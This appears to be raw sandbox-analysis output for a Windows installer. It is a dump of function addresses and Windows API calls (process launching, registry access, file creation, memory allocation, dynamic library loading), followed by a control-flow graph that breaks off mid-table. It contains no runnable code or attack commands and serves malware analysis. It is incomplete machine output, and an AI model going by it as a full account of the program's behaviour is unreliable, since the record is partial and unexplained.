5552->5554 5555 401423 24 API calls 5553->5555 5556 4065c7 2 API calls 5554->5556 5558 402250 5554->5558 5555->5558 5557 4016b6 5556->5557 5557->5558 5559 40604a 36 API calls 5557->5559 5559->5553 5560 6fbc1000 5561 6fbc101b 5 API calls 5560->5561 5562 6fbc1019 5561->5562 5563 401e7d 5564 402c41 17 API calls 5563->5564 5565 401e83 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e8c 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e95 5568->5569 5570 402c41 17 API calls 5569->5570 5571 401e9e 5570->5571 5572 401423 24 API calls 5571->5572 5573 401ea5 5572->5573 5580 4058b0 ShellExecuteExW 5573->5580 5575 401ee7 5577 40288b 5575->5577 5581 40670f WaitForSingleObject 5575->5581 5578 401f01 CloseHandle 5578->5577 5580->5575 5582 406729 5581->5582 5583 40673b GetExitCodeProcess 5582->5583 5584 40669a 2 API calls 5582->5584 5583->5578 5585 406730 WaitForSingleObject 5584->5585 5585->5582 5586 6fbc2301 5587 6fbc236b 5586->5587 5588 6fbc2395 5587->5588 5589 6fbc2376 GlobalAlloc 5587->5589 5589->5587 5590 4019ff 5591 402c41 17 API calls 5590->5591 5592 401a06 5591->5592 5593 402c41 17 API calls 5592->5593 5594 401a0f 5593->5594 5595 401a16 lstrcmpiW 5594->5595 5596 401a28 lstrcmpW 5594->5596 5597 401a1c 5595->5597 5596->5597 5598 401000 5599 401037 BeginPaint GetClientRect 5598->5599 5602 40100c DefWindowProcW 5598->5602 5600 4010f3 5599->5600 5604 401073 CreateBrushIndirect FillRect DeleteObject 5600->5604 5605 4010fc 5600->5605 5603 401179 5602->5603 5604->5600 5606 401102 CreateFontIndirectW 5605->5606 5607 401167 EndPaint 5605->5607 5606->5607 5608 401112 6 API calls 5606->5608 5607->5603 5608->5607 5616 401503 5617 40150b 5616->5617 5619 40151e 5616->5619 5618 402c1f 17 API calls 5617->5618 5618->5619 4550 402484 4561 402c81 4550->4561 4553 402c41 17 API calls 4554 402497 4553->4554 4555 4024a2 RegQueryValueExW 4554->4555 4559 40288b 4554->4559 4556 4024c8 RegCloseKey 4555->4556 4557 4024c2 4555->4557 4556->4559 4557->4556 4566 4061cb wsprintfW 4557->4566 4562 402c41 17 API calls 4561->4562 4563 402c98 4562->4563 4564 4060f1 RegOpenKeyExW 4563->4564 4565 40248e 4564->4565 4565->4553 4566->4556 5620 402104 5621 402c41 17 API calls 5620->5621 5622 40210b 5621->5622 5623 402c41 17 API calls 5622->5623 5624 402115 5623->5624 5625 402c41 17 API calls 5624->5625 5626 40211f 5625->5626 5627 402c41 17 API calls 5626->5627 5628 402129 5627->5628 5629 402c41 17 API calls 5628->5629 5631 402133 5629->5631 5630 402172 CoCreateInstance 5635 402191 5630->5635 5631->5630 5632 402c41 17 API calls 5631->5632 5632->5630 5633 401423 24 API calls 5634 402250 5633->5634 5635->5633 5635->5634 5636 401f06 5637 402c41 17 API calls 5636->5637 5638 401f0c 5637->5638 5639 4052ec 24 API calls 5638->5639 5640 401f16 5639->5640 5641 40586d 2 API calls 5640->5641 5642 401f1c 5641->5642 5644 40288b 5642->5644 5645 40670f 5 API calls 5642->5645 5647 401f3f CloseHandle 5642->5647 5646 401f31 5645->5646 5646->5647 5649 4061cb wsprintfW 5646->5649 5647->5644 5649->5647 4658 40230c 4659 402314 4658->4659 4660 40231a 4658->4660 4661 402c41 17 API calls 4659->4661 4662 402c41 17 API calls 4660->4662 4664 402328 4660->4664 4661->4660 4662->4664 4663 402336 4666 402c41 17 API calls 4663->4666 4664->4663 4665 402c41 17 API calls 4664->4665 4665->4663 4667 40233f WritePrivateProfileStringW 4666->4667 5650 40190c 5651 401943 5650->5651 5652 402c41 17 API calls 5651->5652 5653 401948 5652->5653 5654 405996 67 API calls 5653->5654 5655 401951 5654->5655 5656 401f8c 5657 402c41 17 API calls 5656->5657 5658 401f93 5657->5658 5659 40665e 5 API calls 5658->5659 5660 401fa2 5659->5660 5661 401fbe GlobalAlloc 5660->5661 5666 402026 5660->5666 5662 401fd2 5661->5662 5661->5666 5663 40665e 5 API calls 5662->5663 5664 401fd9 5663->5664 5665 40665e 5 API calls 5664->5665 5667 401fe3 5665->5667 5667->5666 5671 4061cb wsprintfW 5667->5671 5669 402018 5672 4061cb wsprintfW 5669->5672 5671->5669 5672->5666 5673 6fbc1671 5674 6fbc1516 GlobalFree 5673->5674 5677 6fbc1689 5674->5677 5675 6fbc16cf GlobalFree 5676 6fbc16a4 5676->5675 5677->5675 5677->5676 5678 6fbc16bb VirtualFree 5677->5678 5678->5675 5679 40238e 5680 4023c1 5679->5680 5681 402396 5679->5681 5683 402c41 17 API calls 5680->5683 5682 402c81 17 API calls 5681->5682 5684 40239d 5682->5684 5685 4023c8 5683->5685 5687 402c41 17 API calls 5684->5687 5688 4023d5 5684->5688 5690 402cff 5685->5690 5689 4023ae RegDeleteValueW RegCloseKey 5687->5689 5689->5688 5691 402d13 5690->5691 5692 402d0c 5690->5692 5691->5692 5694 402d44 5691->5694 5692->5688 5695 4060f1 RegOpenKeyExW 5694->5695 5696 402d72 5695->5696 5697 402d98 RegEnumKeyW 5696->5697 5698 402daf RegCloseKey 5696->5698 5699 402dd0 RegCloseKey 5696->5699 5702 402d44 6 API calls 5696->5702 5704 402dc3 5696->5704 5697->5696 5697->5698 5700 40665e 5 API calls 5698->5700 5699->5704 5701 402dbf 5700->5701 5703 402de0 RegDeleteKeyW 5701->5703 5701->5704 5702->5696 5703->5704 5704->5692 5705 40698e 5711 406812 5705->5711 5706 40717d 5707 406893 GlobalFree 5708 40689c GlobalAlloc 5707->5708 5708->5706 5708->5711 5709 406913 GlobalAlloc 5709->5706 5709->5711 5710 40690a GlobalFree 5710->5709 5711->5706 5711->5707 5711->5708 5711->5709 5711->5710 5712 40190f 5713 402c41 17 API calls 5712->5713 5714 401916 5713->5714 5715 4058ea MessageBoxIndirectW 5714->5715 5716 40191f 5715->5716 5717 401491 5718 4052ec 24 API calls 5717->5718 5719 401498 5718->5719 5720 401d14 5721 402c1f 17 API calls 5720->5721 5722 401d1b 5721->5722 5723 402c1f 17 API calls 5722->5723 5724 401d27 GetDlgItem 5723->5724 5725 402592 5724->5725 5733 402598 5734 4025c7 5733->5734 5735 4025ac 5733->5735 5736 4025fb 5734->5736 5737 4025cc 5734->5737 5738 402c1f 17 API calls 5735->5738 5740 402c41 17 API calls 5736->5740 5739 402c41 17 API calls 5737->5739 5745 4025b3 5738->5745 5741 4025d3 WideCharToMultiByte lstrlenA 5739->5741 5742 402602 lstrlenW 5740->5742 5741->5745 5742->5745 5743 402645 5744 40262f 5744->5743 5746 405e2c WriteFile 5744->5746 5745->5743 5745->5744 5747 405e5b 5 API calls 5745->5747 5746->5743 5747->5744 5748 6fbc10e1 5757 6fbc1111 5748->5757 5749 6fbc11d8 GlobalFree 5750 6fbc12ba 2 API calls 5750->5757 5751 6fbc11d3 5751->5749 5752 6fbc11f8 GlobalFree 5752->5757 5753 6fbc1272 2 API calls 5756 6fbc11c4 GlobalFree 5753->5756 5754 6fbc1164 GlobalAlloc 5754->5757 5755 6fbc12e1 lstrcpyW 5755->5757 5756->5757 5757->5749 5757->5750 5757->5751 5757->5752 5757->5753 5757->5754 5757->5755 5757->5756 5758 40149e 5759 4022f7 5758->5759 5760 4014ac PostQuitMessage 5758->5760 5760->5759 5761 401c1f 5762 402c1f 17 API calls 5761->5762 5763 401c26 5762->5763 5764 402c1f 17 API calls 5763->5764 5765 401c33 5764->5765 5766 401c48 5765->5766 5767 402c41 17 API calls 5765->5767 5768 401c58 5766->5768 5771 402c41 17 API calls 5766->5771 5767->5766 5769 401c63 5768->5769 5770 401caf 5768->5770 5772 402c1f 17 API calls 5769->5772 5773 402c41 17 API calls 5770->5773 5771->5768 5774 401c68 5772->5774 5775 401cb4 5773->5775 5776 402c1f 17 API calls 5774->5776 5777 402c41 17 API calls 5775->5777 5778 401c74 5776->5778 5779 401cbd FindWindowExW 5777->5779 5780 401c81 SendMessageTimeoutW 5778->5780 5781 401c9f SendMessageW 5778->5781 5782 401cdf 5779->5782 5780->5782 5781->5782 5783 402aa0 SendMessageW 5784 402ac5 5783->5784 5785 402aba InvalidateRect 5783->5785 5785->5784 5786 402821 5787 402827 5786->5787 5788 402ac5 5787->5788 5789 40282f FindClose 5787->5789 5789->5788 5790 6fbc18dd 5791 6fbc1900 5790->5791 5792 6fbc1935 GlobalFree 5791->5792 5793 6fbc1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5791->5793 5792->5793 5794 6fbc1272 2 API calls 5793->5794 5795 6fbc1ad2 GlobalFree GlobalFree 5794->5795 4383 403d22 4384 403e75 4383->4384 4385 403d3a 4383->4385 4387 403ec6 4384->4387 4388 403e86 GetDlgItem GetDlgItem 4384->4388 4385->4384 4386 403d46 4385->4386 4389 403d51 SetWindowPos 4386->4389 4390 403d64 4386->4390 4392 403f20 4387->4392 4400 401389 2 API calls 4387->4400 4391 4041fb 18 API calls 4388->4391 4389->4390 4394 403d81 4390->4394 4395 403d69 ShowWindow 4390->4395 4396 403eb0 SetClassLongW 4391->4396 4445 403e70 4392->4445 4454 404247 4392->4454 4397 403da3 4394->4397 4398 403d89 DestroyWindow 4394->4398 4395->4394 4399 40140b 2 API calls 4396->4399 4402 403da8 SetWindowLongW 4397->4402 4403 403db9 4397->4403 4453 404184 4398->4453 4399->4387 4401 403ef8 4400->4401 4401->4392 4404 403efc SendMessageW 4401->4404 4402->4445 4407 403e62 4403->4407 4408 403dc5 GetDlgItem 4403->4408 4404->4445 4405 40140b 2 API calls 4443 403f32 4405->4443 4406 404186 DestroyWindow EndDialog 4406->4453 4476 404262 4407->4476 4411 403dd8 SendMessageW IsWindowEnabled 4408->4411 4412 403df5 4408->4412 4410 4041b5 ShowWindow 4410->4445 4411->4412 4411->4445 4414 403e02 4412->4414 4415 403e49 SendMessageW 4412->4415 4416 403e15 4412->4416 4425 403dfa 4412->4425 4413 4062a6 17 API calls 4413->4443 4414->4415 4414->4425 4415->4407 4418 403e32 4416->4418 4419 403e1d 4416->4419 4422 40140b 2 API calls 4418->4422 4470 40140b 4419->4470 4420 403e30 4420->4407 4424 403e39 4422->4424 4423 4041fb 18 API calls 4423->4443 4424->4407 4424->4425 4473 4041d4 4425->4473 4427 403fad GetDlgItem 4428 403fc2 4427->4428 4429 403fca ShowWindow KiUserCallbackDispatcher 4427->4429 4428->4429 4460 40421d KiUserCallbackDispatcher 4429->4460 4431 403ff4 EnableWindow 4436 404008 4431->4436 4432 40400d GetSystemMenu EnableMenuItem SendMessageW 4433 40403d SendMessageW 4432->4433 4432->4436 4433->4436 4436->4432 4461 404230 SendMessageW 4436->4461 4462 403d03 4436->4462 4465 406284 lstrcpynW 4436->4465 4438 40406c lstrlenW 4439 4062a6 17 API calls 4438->4439 4440 404082 SetWindowTextW 4439->4440 4466 401389 4440->4466 4442 4040c6 DestroyWindow 4444 4040e0 CreateDialogParamW 4442->4444 4442->4453 4443->4405 4443->4406 4443->4413 4443->4423 4443->4442 4443->4445 4457 4041fb 4443->4457 4446 404113 4444->4446 4444->4453 4447 4041fb 18 API calls 4446->4447 4448 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4447->4448 4449 401389 2 API calls 4448->4449 4450 404164 4449->4450 4450->4445 4451 40416c ShowWindow 4450->4451 4452 404247 SendMessageW 4451->4452 4452->4453 4453->4410 4453->4445 4455 404250 SendMessageW 4454->4455 4456 40425f 4454->4456 4455->4456 4456->4443 4458 4062a6 17 API calls 4457->4458 4459 404206 SetDlgItemTextW 4458->4459 4459->4427 4460->4431 4461->4436 4463 4062a6 17 API calls 4462->4463 4464 403d11 SetWindowTextW 4463->4464 4464->4436 4465->4438 4468 401390 4466->4468 4467 4013fe 4467->4443 4468->4467 4469 4013cb MulDiv SendMessageW 4468->4469 4469->4468 4471 401389 2 API calls 4470->4471 4472 401420 4471->4472 4472->4425 4474 4041e1 SendMessageW 4473->4474 4475 4041db 4473->4475 4474->4420 4475->4474 4477 404325 4476->4477 4478 40427a GetWindowLongW 4476->4478 4477->4445 4478->4477 4479 40428f 4478->4479 4479->4477 4480 4042bc GetSysColor 4479->4480 4481 4042bf 4479->4481 4480->4481 4482 4042c5 SetTextColor 4481->4482 4483 4042cf SetBkMode 4481->4483 4482->4483 4484 4042e7 GetSysColor 4483->4484 4485 4042ed 4483->4485 4484->4485 4486 4042f4 SetBkColor 4485->4486 4487 4042fe 4485->4487 4486->4487 4487->4477 4488 404311 DeleteObject 4487->4488 4489 404318 CreateBrushIndirect 4487->4489 4488->4489 4489->4477 5796 4015a3 5797 402c41 17 API calls 5796->5797 5798 4015aa SetFileAttributesW 5797->5798 5799 4015bc 5798->5799 5800 6fbc16d8 5801 6fbc1707 5800->5801 5802 6fbc1b63 22 API calls 5801->5802 5803 6fbc170e 5802->5803 5804 6fbc1715 5803->5804 5805 6fbc1721 5803->5805 5806 6fbc1272 2 API calls 5804->5806 5807 6fbc1748 5805->5807 5808 6fbc172b 5805->5808 5809 6fbc171f 5806->5809 5811 6fbc174e 5807->5811 5812 6fbc1772 5807->5812 5810 6fbc153d 3 API calls 5808->5810 5814 6fbc1730 5810->5814 5815 6fbc15b4 3 API calls 5811->5815 5813 6fbc153d 3 API calls 5812->5813 5813->5809 5816 6fbc15b4 3 API calls 5814->5816 5817 6fbc1753 5815->5817 5819 6fbc1736 5816->5819 5818 6fbc1272 2 API calls 5817->5818 5820 6fbc1759 GlobalFree 5818->5820 5821 6fbc1272 2 API calls 5819->5821 5820->5809 5822 6fbc176d GlobalFree 5820->5822 5823 6fbc173c GlobalFree 5821->5823 5822->5809 5823->5809 5824 6fbc1058 5826 6fbc1074 5824->5826 5825 6fbc10dd 5826->5825 5827 6fbc1092 5826->5827 5828 6fbc1516 GlobalFree 5826->5828 5829 6fbc1516 GlobalFree 5827->5829 5828->5827 5830 6fbc10a2 5829->5830 5831 6fbc10a9 GlobalSize 5830->5831 5832 6fbc10b2 5830->5832 5831->5832 5833 6fbc10c7 5832->5833 5834 6fbc10b6 GlobalAlloc 5832->5834 5836 6fbc10d2 GlobalFree 5833->5836 5835 6fbc153d 3 API calls 5834->5835 5835->5833 5836->5825 5837 4046a5 5838 4046b5 5837->5838 5839 4046db 5837->5839 5840 4041fb 18 API calls 5838->5840 5841 404262 8 API calls 5839->5841 5842 4046c2 SetDlgItemTextW 5840->5842 5843 4046e7 5841->5843 5842->5839 5844 4029a8 5845 402c1f 17 API calls 5844->5845 5846 4029ae 5845->5846 5847 4029d5 5846->5847 5848 4029ee 5846->5848 5853 40288b 5846->5853 5849 4029da 5847->5849 5857 4029eb 5847->5857 5850 402a08 5848->5850 5851 4029f8 5848->5851 5858 406284 lstrcpynW 5849->5858 5852 4062a6 17 API calls 5850->5852 5854 402c1f 17 API calls 5851->5854 5852->5857 5854->5857 5857->5853 5859 4061cb wsprintfW 5857->5859 5858->5853 5859->5853 4602 40542b 4603 4055d5 4602->4603 4604 40544c GetDlgItem GetDlgItem GetDlgItem 4602->4604 4606 405606 4603->4606 4607 4055de GetDlgItem CreateThread CloseHandle 4603->4607 4648 404230 SendMessageW 4604->4648 4609 405631 4606->4609 4612 405656 4606->4612 4613 40561d ShowWindow ShowWindow 4606->4613 4607->4606 4651 4053bf OleInitialize 4607->4651 4608 4054bc 4617 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4608->4617 4610 405691 4609->4610 4611 40563d 4609->4611 4610->4612 4625 40569f SendMessageW 4610->4625 4614 405645 4611->4614 4615 40566b ShowWindow 4611->4615 4616 404262 8 API calls 4612->4616 4650 404230 SendMessageW 4613->4650 4619 4041d4 SendMessageW 4614->4619 4621 40568b 4615->4621 4622 40567d 4615->4622 4620 405664 4616->4620 4623 405531 4617->4623 4624 405515 SendMessageW SendMessageW 4617->4624 4619->4612 4627 4041d4 SendMessageW 4621->4627 4626 4052ec 24 API calls 4622->4626 4628 405544 4623->4628 4629 405536 SendMessageW 4623->4629 4624->4623 4625->4620 4630 4056b8 CreatePopupMenu 4625->4630 4626->4621 4627->4610 4632 4041fb 18 API calls 4628->4632 4629->4628 4631 4062a6 17 API calls 4630->4631 4633 4056c8 AppendMenuW 4631->4633 4634 405554 4632->4634 4635 4056e5 GetWindowRect 4633->4635 4636 4056f8 TrackPopupMenu 4633->4636 4637 405591 GetDlgItem SendMessageW 4634->4637 4638 40555d ShowWindow 4634->4638 4635->4636 4636->4620 4639 405713 4636->4639 4637->4620 4642 4055b8 SendMessageW SendMessageW 4637->4642 4640 405580 4638->4640 4641 405573 ShowWindow 4638->4641 4643 40572f SendMessageW 4639->4643 4649 404230 SendMessageW 4640->4649 4641->4640 4642->4620 4643->4643 4644 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4643->4644 4646 405771 SendMessageW 4644->4646 4646->4646 4647 40579a GlobalUnlock SetClipboardData CloseClipboard 4646->4647 4647->4620 4648->4608 4649->4637 4650->4609 4652 404247 SendMessageW 4651->4652 4653 4053e2 4652->4653 4656 401389 2 API calls 4653->4656 4657 405409 4653->4657 4654 404247 SendMessageW 4655 40541b OleUninitialize 4654->4655 4656->4653 4657->4654 5867 4028ad 5868 402c41 17 API calls 5867->5868 5870 4028bb 5868->5870 5869 4028d1 5872 405d55 2 API calls 5869->5872 5870->5869 5871 402c41 17 API calls 5870->5871 5871->5869 5873 4028d7 5872->5873 5895 405d7a GetFileAttributesW CreateFileW 5873->5895 5875 4028e4 5876 4028f0 GlobalAlloc 5875->5876 5877 402987 5875->5877 5878 402909 5876->5878 5879 40297e CloseHandle 5876->5879 5880 4029a2 5877->5880 5881 40298f DeleteFileW 5877->5881 5896 403311 SetFilePointer 5878->5896 5879->5877 5881->5880 5883 40290f 5884 4032fb ReadFile 5883->5884 5885 402918 GlobalAlloc 5884->5885 5886 402928 5885->5886 5887 40295c 5885->5887 5889 403116 35 API calls 5886->5889 5888 405e2c WriteFile 5887->5888 5890 402968 GlobalFree 5888->5890 5894 402935 5889->5894 5891 403116 35 API calls 5890->5891 5892 40297b 5891->5892 5892->5879 5893 402953 GlobalFree 5893->5887 5894->5893 5895->5875 5896->5883 5897 401a30 5898 402c41 17 API calls 5897->5898 5899 401a39 ExpandEnvironmentStringsW 5898->5899 5900 401a4d 5899->5900 5902 401a60 5899->5902 5901 401a52 lstrcmpW 5900->5901 5900->5902 5901->5902 5903 404331 lstrcpynW lstrlenW 4723 402032 4724 402044 4723->4724 4725 4020f6 4723->4725 4726 402c41 17 API calls 4724->4726 4727 401423 24 API calls 4725->4727 4728 40204b 4726->4728 4734 402250 4727->4734 4729 402c41 17 API calls 4728->4729 4730 402054 4729->4730 4731 40206a LoadLibraryExW 4730->4731 4732 40205c GetModuleHandleW 4730->4732 4731->4725 4733 40207b 4731->4733 4732->4731 4732->4733 4746 4066cd WideCharToMultiByte 4733->4746 4737 4020c5 4739 4052ec 24 API calls 4737->4739 4738 40208c 4740 402094 4738->4740 4741 4020ab 4738->4741 4742 40209c 4739->4742 4743 401423 24 API calls 4740->4743 4749 6fbc177b 4741->4749 4742->4734 4744 4020e8 FreeLibrary 4742->4744 4743->4742 4744->4734 4747 4066f7 GetProcAddress 4746->4747 4748 402086 4746->4748 4747->4748 4748->4737 4748->4738 4750 6fbc17ae 4749->4750 4791 6fbc1b63 4750->4791 4752 6fbc17b5 4753 6fbc18da 4752->4753 4754 6fbc17cd 4752->4754 4755 6fbc17c6 4752->4755 4753->4742 4823 6fbc2398 4754->4823 4839 6fbc2356 4755->4839 4760 6fbc17fc 4775 6fbc17f2 4760->4775 4849 6fbc2d2f 4760->4849 4761 6fbc17e3 4765 6fbc17e9 4761->4765 4769 6fbc17f4 4761->4769 4762 6fbc1831 4766 6fbc1837 4762->4766 4767 6fbc1882 4762->4767 4763 6fbc1813 4852 6fbc256d 4763->4852 4765->4775 4833 6fbc2a74 4765->4833 4871 6fbc15c6 4766->4871 4773 6fbc256d 10 API calls 4767->4773 4768 6fbc1819 4863 6fbc15b4 4768->4863 4843 6fbc2728 4769->4843 4778 6fbc1873 4773->4778 4775->4762 4775->4763 4782 6fbc18c9 4778->4782 4878 6fbc2530 4778->4878 4780 6fbc17fa 4780->4775 4781 6fbc256d 10 API calls 4781->4778 4782->4753 4786 6fbc18d3 GlobalFree 4782->4786 4786->4753 4788 6fbc18b5 4788->4782 4882 6fbc153d wsprintfW 4788->4882 4789 6fbc18ae FreeLibrary 4789->4788 4885 6fbc121b GlobalAlloc 4791->4885 4793 6fbc1b87 4886 6fbc121b GlobalAlloc 4793->4886 4795 6fbc1dad GlobalFree GlobalFree GlobalFree 4796 6fbc1dca 4795->4796 4813 6fbc1e14 4795->4813 4797 6fbc2196 4796->4797 4804 6fbc1ddf 4796->4804 4796->4813 4799 6fbc21b8 GetModuleHandleW 4797->4799 4797->4813 4798 6fbc1c68 GlobalAlloc 4812 6fbc1b92 4798->4812 4801 6fbc21de 4799->4801 4802 6fbc21c9 LoadLibraryW 4799->4802 4800 6fbc1cd1 GlobalFree 4800->4812 4893 6fbc1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4801->4893 4802->4801 4802->4813 4803 6fbc1cb3 lstrcpyW 4806 6fbc1cbd lstrcpyW 4803->4806 4804->4813 4889 6fbc122c 4804->4889 4806->4812 4807 6fbc2230 4809 6fbc223d lstrlenW 4807->4809 4807->4813 4894 6fbc1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4809->4894 4810 6fbc2068 4892 6fbc121b GlobalAlloc 4810->4892 4812->4795 4812->4798 4812->4800 4812->4803 4812->4806 4812->4810 4812->4813 4816 6fbc20f0 4812->4816 4818 6fbc1fa9 GlobalFree 4812->4818 4819 6fbc122c 2 API calls 4812->4819 4887 6fbc158f GlobalSize GlobalAlloc 4812->4887 4813->4752 4814 6fbc21f0 4814->4807 4821 6fbc221a GetProcAddress 4814->4821 4816->4813 4817 6fbc2138 lstrcpyW 4816->4817 4817->4813 4818->4812 4819->4812 4821->4807 4822 6fbc2071 4822->4752 4824 6fbc23b0 4823->4824 4826 6fbc24d9 GlobalFree 4824->4826 4828 6fbc2458 GlobalAlloc WideCharToMultiByte 4824->4828 4829 6fbc2483 GlobalAlloc 4824->4829 4830 6fbc122c GlobalAlloc lstrcpynW 4824->4830 4831 6fbc249a 4824->4831 4896 6fbc12ba 4824->4896 4826->4824 4827 6fbc17d3 4826->4827 4827->4760 4827->4761 4827->4775 4828->4826 4829->4831 4830->4824 4831->4826 4900 6fbc26bc 4831->4900 4835 6fbc2a86 4833->4835 4834 6fbc2b2b CreateFileA 4836 6fbc2b49 4834->4836 4835->4834 4837 6fbc2c3a GetLastError 4836->4837 4838 6fbc2c45 4836->4838 4837->4838 4838->4775 4840 6fbc236b 4839->4840 4841 6fbc17cc 4840->4841 4842 6fbc2376 GlobalAlloc 4840->4842 4841->4754 4842->4840 4847 6fbc2758 4843->4847 4844 6fbc2806 4846 6fbc280c GlobalSize 4844->4846 4848 6fbc2816 4844->4848 4845 6fbc27f3 GlobalAlloc 4845->4848 4846->4848 4847->4844 4847->4845 4848->4780 4850 6fbc2d3a 4849->4850 4851 6fbc2d7a GlobalFree 4850->4851 4903 6fbc121b GlobalAlloc 4852->4903 4854 6fbc25f0 MultiByteToWideChar 4861 6fbc2577 4854->4861 4855 6fbc2612 StringFromGUID2 4855->4861 4856 6fbc2623 lstrcpynW 4856->4861 4857 6fbc2636 wsprintfW 4857->4861 4858 6fbc265a GlobalFree 4858->4861 4859 6fbc268f GlobalFree 4859->4768 4860 6fbc1272 2 API calls 4860->4861 4861->4854 4861->4855 4861->4856 4861->4857 4861->4858 4861->4859 4861->4860 4904 6fbc12e1 4861->4904 4908 6fbc121b GlobalAlloc 4863->4908 4865 6fbc15b9 4866 6fbc15c6 2 API calls 4865->4866 4867 6fbc15c3 4866->4867 4868 6fbc1272 4867->4868 4869 6fbc127b GlobalAlloc lstrcpynW 4868->4869 4870 6fbc12b5 GlobalFree 4868->4870 4869->4870 4870->4778 4872 6fbc15e4 4871->4872 4873 6fbc15d6 lstrcpyW 4871->4873 4872->4873 4876 6fbc15f0 4872->4876 4875 6fbc161d 4873->4875 4875->4781 4876->4875 4877 6fbc160d wsprintfW 4876->4877 4877->4875 4879 6fbc253e 4878->4879 4881 6fbc1895 4878->4881 4880 6fbc255a GlobalFree 4879->4880 4879->4881 4880->4879 4881->4788 4881->4789 4883 6fbc1272 2 API calls 4882->4883 4884 6fbc155e 4883->4884 4884->4782 4885->4793 4886->4812 4888 6fbc15ad 4887->4888 4888->4812 4895 6fbc121b GlobalAlloc 4889->4895 4891 6fbc123b lstrcpynW 4891->4813 4892->4822 4893->4814 4894->4813 4895->4891 4897 6fbc12c1 4896->4897 4898 6fbc122c 2 API calls 4897->4898 4899 6fbc12df 4898->4899 4899->4824 4901 6fbc26ca VirtualAlloc 4900->4901 4902 6fbc2720 4900->4902 4901->4902 4902->4831 4903->4861 4905 6fbc130c 4904->4905 4906 6fbc12ea 4904->4906 4905->4861 4906->4905 4907 6fbc12f0 lstrcpyW 4906->4907 4907->4905 4908->4865 5904 403932 5905 40393d 5904->5905 5906 403941 5905->5906 5907 403944 GlobalAlloc 5905->5907 5907->5906 5913 6fbc2c4f 5914 6fbc2c67 5913->5914 5915 6fbc158f 2 API calls 5914->5915 5916 6fbc2c82 5915->5916 5917 402a35 5918 402c1f 17 API calls 5917->5918 5919 402a3b 5918->5919 5920 402a72 5919->5920 5922 40288b 5919->5922 5923 402a4d 5919->5923 5921 4062a6 17 API calls 5920->5921 5920->5922 5921->5922 5923->5922 5925 4061cb wsprintfW 5923->5925 5925->5922 5926 401735 5927 402c41 17 API calls 5926->5927 5928 40173c SearchPathW 5927->5928 5929 4029e6 5928->5929 5930 401757 5928->5930 5930->5929 5932 406284 lstrcpynW 5930->5932 5932->5929 5933 4014b8 5934 4014be 5933->5934 5935 401389 2 API calls 5934->5935 5936 4014c6 5935->5936 5937 401db9 GetDC 5938 402c1f 17 API calls 5937->5938 5939 401dcb GetDeviceCaps MulDiv ReleaseDC 5938->5939 5940 402c1f 17 API calls 5939->5940 5941 401dfc 5940->5941 5942 4062a6 17 API calls 5941->5942 5943 401e39 CreateFontIndirectW 5942->5943 5944 402592 5943->5944 5945 4043ba 5946 4043d2 5945->5946 5950 4044ec 5945->5950 5951 4041fb 18 API calls 5946->5951 5947 404556 5948 404620 5947->5948 5949 404560 GetDlgItem 5947->5949 5956 404262 8 API calls 5948->5956 5952 4045e1 5949->5952 5953 40457a 5949->5953 5950->5947 5950->5948 5954 404527 GetDlgItem SendMessageW 5950->5954 5955 404439 5951->5955 5952->5948 5959 4045f3 5952->5959 5953->5952 5958 4045a0 SendMessageW LoadCursorW SetCursor 5953->5958 5978 40421d KiUserCallbackDispatcher 5954->5978 5961 4041fb 18 API calls 5955->5961 5957 40461b 5956->5957 5979 404669 5958->5979 5963 404609 5959->5963 5964 4045f9 SendMessageW 5959->5964 5966 404446 CheckDlgButton 5961->5966 5963->5957 5968 40460f SendMessageW 5963->5968 5964->5963 5965 404551 5969 404645 SendMessageW 5965->5969 5976 40421d KiUserCallbackDispatcher 5966->5976 5968->5957 5969->5947 5971 404464 GetDlgItem 5977 404230 SendMessageW 5971->5977 5973 40447a SendMessageW 5974 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5973->5974 5975 404497 GetSysColor 5973->5975 5974->5957 5975->5974 5976->5971 5977->5973 5978->5965 5982 4058b0 ShellExecuteExW 5979->5982 5981 4045cf LoadCursorW SetCursor 5981->5952 5982->5981 5983 40283b 5984 402843 5983->5984 5985 402847 FindNextFileW 5984->5985 5986 402859 5984->5986 5985->5986 5987 4029e6 5986->5987 5989 406284 lstrcpynW 5986->5989 5989->5987

                                                                  Executed Functions

                                                                  Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 7 4033a2 1->7 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 7->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 21 4033ea 17->21 21->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 31 403482-403487 28->31 32 403489-40348d 28->32 38 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->38 39 4035fd-403617 DeleteFileW call 402edd 29->39 31->31 31->32 33 403494-403498 32->33 34 40348f-403493 32->34 36 403557-403564 call 405b86 33->36 37 40349e-4034a4 33->37 34->33 52 403566-403567 36->52 53 403568-40356e 36->53 41 4034a6-4034ae 37->41 42 4034bf-4034f8 37->42 38->39 58 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 38->58 54 4036c8-4036d8 call 40389a OleUninitialize 39->54 55 40361d-403623 39->55 47 4034b0-4034b3 41->47 48 4034b5 41->48 49 403515-40354f 42->49 50 4034fa-4034ff 42->50 47->42 47->48 48->42 49->36 57 403551-403555 49->57 50->49 56 403501-403509 50->56 52->53 53->28 59 403574 53->59 75 4037fe-403804 54->75 76 4036de-4036ee call 4058ea ExitProcess 54->76 60 4036b8-4036bf call 403974 55->60 61 403629-403634 call 405b86 55->61 63 403510 56->63 64 